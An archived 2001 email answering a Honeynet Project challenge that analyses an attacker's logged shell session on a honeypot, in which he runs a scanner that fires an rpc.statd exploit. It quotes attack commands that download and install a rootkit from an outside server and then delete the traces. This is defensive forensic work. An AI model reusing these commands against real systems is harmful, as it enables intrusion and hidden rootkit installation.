From abernau@trusecure.com Sat Mar 17 20:01:33 2001 Date: Mon, 05 Mar 2001 12:29:52 +0800 From: Adam Bernau To: project@honeynet.org Subject: March scan of the month 1. What is the blackhat trying to accomplish with his command line syntax? The attacker is attempting to use a (previously made during compromise?) hidden directory to download, unpack, and use his toolkit. First, attempts to cd into the .mail directory. He realises that he needs to cd into an absolute path directory. Jan 8 18:47:52 honeypot -bash: HISTORY: PID=1246 UID=0 cd .mail Jan 8 18:48:00 honeypot -bash: HISTORY: PID=1246 UID=0 cd /usr/sbin/.mail Downloads the toolkit from the authors server Jan 8 18:48:12 honeypot -bash: HISTORY: PID=1246 UID=0 lynx www.becys.org/LUCKROOT.TAR Jan 8 18:48:31 honeypot -bash: HISTORY: PID=1246 UID=0 y Tries to uncompress, but options in the wrong order. Either not familiar with the gnu tar, or on a system without gnu tar (as - is not needed/suggested). The 'Lu' and 'L' lines looks as though he is attempting to use for filename completion. Jan 8 18:48:45 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xvfz LUCKROOT.TAR Jan 8 18:48:59 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xzvf Lu Jan 8 18:49:01 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xzvf L Jan 8 18:49:03 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xzvf LUCKROOT.TAR cd's into the directory, starts the script, which compiles the scanner and starts scanning. From the addresses, 12, 24, 63, 64 are all cable-modem land addresses that I know of, so he's after machines with fast links. Unsure why those ports were chosen (except for 1-tcpmux). There is some duplication - 200.* port 120 and 216.* port 1 Jan 8 18:49:06 honeypot -bash: HISTORY: PID=1246 UID=0 cd luckroot Jan 8 18:49:13 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 210 Jan 8 18:51:07 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 200 120 Jan 8 18:51:43 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 64 120 Jan 8 18:52:00 honeypot -bash: HISTORY: PID=1246 UID=0 .luckgo 216 200 Jan 8 18:52:06 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 200 Jan 8 18:54:37 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 200 120 Jan 8 18:55:26 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 63 1 Jan 8 18:56:06 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 10 Jan 8 19:06:04 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 210 120 Jan 8 19:07:03 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 64 1 Jan 8 19:07:34 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 1 Jan 8 19:09:41 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 194 1 Jan 8 19:10:53 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 1 Jan 8 19:12:13 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 210 128 Jan 8 19:23:30 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 24 1 Jan 8 19:35:55 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 12 20 2. What does the tool accomplish? The tool is scanning by A class network addresses by port, with optional usage of B/C class specification. If the scanner gets a successful connection to each machine, it then throws the linux rpc.statd exploit at it, in an attempt to root that machine too. 3. How does the tool work? Usage is luckgo [[ ]]. Assuming only the A class specification as used here, it opens MAX_SOCKETS as defined by the machine, and attempts a connection to each address in turn by incrementing from 0 through to 255 for each octet of the address. When the max sockets are full, it loops while waiting for one to free up by being successful or the connection rejected. If the connection is successful before it times out, execute the linux statd exploit (luckstatdx) at that ip address via the system() call. 4. Is this tool a worm, or would you classify it as something else? This tool is not a worm. On successful exploit of the server, starting a root shell on port 39168, the exploit connects to that port, and issues the following commands: cd /; uname -a; id; wget -nd http://www.becys.org/xzibit.tar.gz; tar -zxvf xzibit.tar.gz; cd lamerk; ./install; cd /; rm -rf lamerk xzibit.tar.gz; I did not check, but assume that xzibit.tar.gz is a rootkit only. The scanner is another package to be downloaded, and seems to have to be run manually, and is subject to typo's :) 5. Is this tool original, or modified? Don't know. I would guess that the statd exploit is a copy of another statd exploit, modified to automate the download/install of the rootkit. Adam -- Adam Bernau TruSecure Asia Pacific Email: abernau@trusecure.com URL: http://www.trusecure.com